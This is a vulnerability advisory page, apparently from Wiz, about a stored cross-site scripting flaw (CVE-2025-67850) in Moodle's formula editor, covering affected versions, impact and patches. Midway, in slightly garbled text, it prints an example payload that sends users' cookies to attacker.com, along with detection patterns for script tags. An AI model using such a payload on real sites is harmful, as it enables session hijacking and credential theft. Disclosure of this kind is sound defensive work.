
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-67850 is a stored Cross-Site Scripting (XSS) vulnerability in Moodle's formula editor that allows remote attackers to inject malicious scripts into arithmetic expression fields. When other users view these expressions, the injected code executes in their browsers, potentially compromising data or enabling unauthorized actions. The vulnerability was reported on December 19, 2025, and publicly disclosed on February 3, 2026. Affected versions include Moodle < 4.1.22, >= 4.4.0 and < 4.4.12, >= 4.5.0 and < 4.5.8, >= 5.0.0 and < 5.0.4, and >= 5.1.0 and < 5.1.1. The CVSS v3.1 base score is 7.3 (High) per the GitHub Advisory, or 6.1 (Medium) per NVD (Github Advisory, Red Hat Bugzilla).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically insufficient input filtering in the formula editor's arithmetic expression fields (CWE-79). An attacker with at least low-level privileges can craft a malicious payload and submit it via the formula editor; when another user views the expression, the script executes in their browser context. The attack vector is network-based, requires low privileges to inject, and requires user interaction (a victim viewing the expression) to trigger. A patch commit is publicly referenced at moodle/moodle@c85f153 (Github Advisory, Red Hat Bugzilla).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who view the malicious formula expressions, leading to session hijacking, credential theft, unauthorized actions on behalf of victims, or further phishing attacks within the Moodle platform. The CVSS assessment indicates high confidentiality and integrity impact (per the GitHub Advisory scoring), meaning sensitive user data could be accessed or modified. Availability is not directly impacted, but the compromise of user sessions could have cascading effects on the integrity of course content and user data (Github Advisory).
No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-67850 as of the available data. The EPSS score is approximately 0.041% (0.000410), placing it in the 2nd percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Github Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent encoded variant that bypasses any partial filters./question/type/calculated/ or similar quiz/formula editor paths) containing HTML tags or JavaScript keywords (<script>, onerror, javascript:) in request bodies.Moodle has released patched versions that address this vulnerability: 4.1.22, 4.4.12, 4.5.8, 5.0.4, and 5.1.1. Administrators should upgrade to the appropriate patched version as soon as possible. No specific configuration-based workaround has been published; restricting access to the formula editor to trusted users only may reduce exposure until patching is feasible (Github Advisory, Red Hat Bugzilla).
The vulnerability was reported via Red Hat's Bugzilla by the OSIDB Bzimport process on December 19, 2025, and assigned high severity by Red Hat's Product Security team. The Moodle project acknowledged the issue in their community forum. No significant broader media coverage or notable researcher commentary beyond standard vulnerability database entries has been identified (Red Hat Bugzilla, Moodle Forum).
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."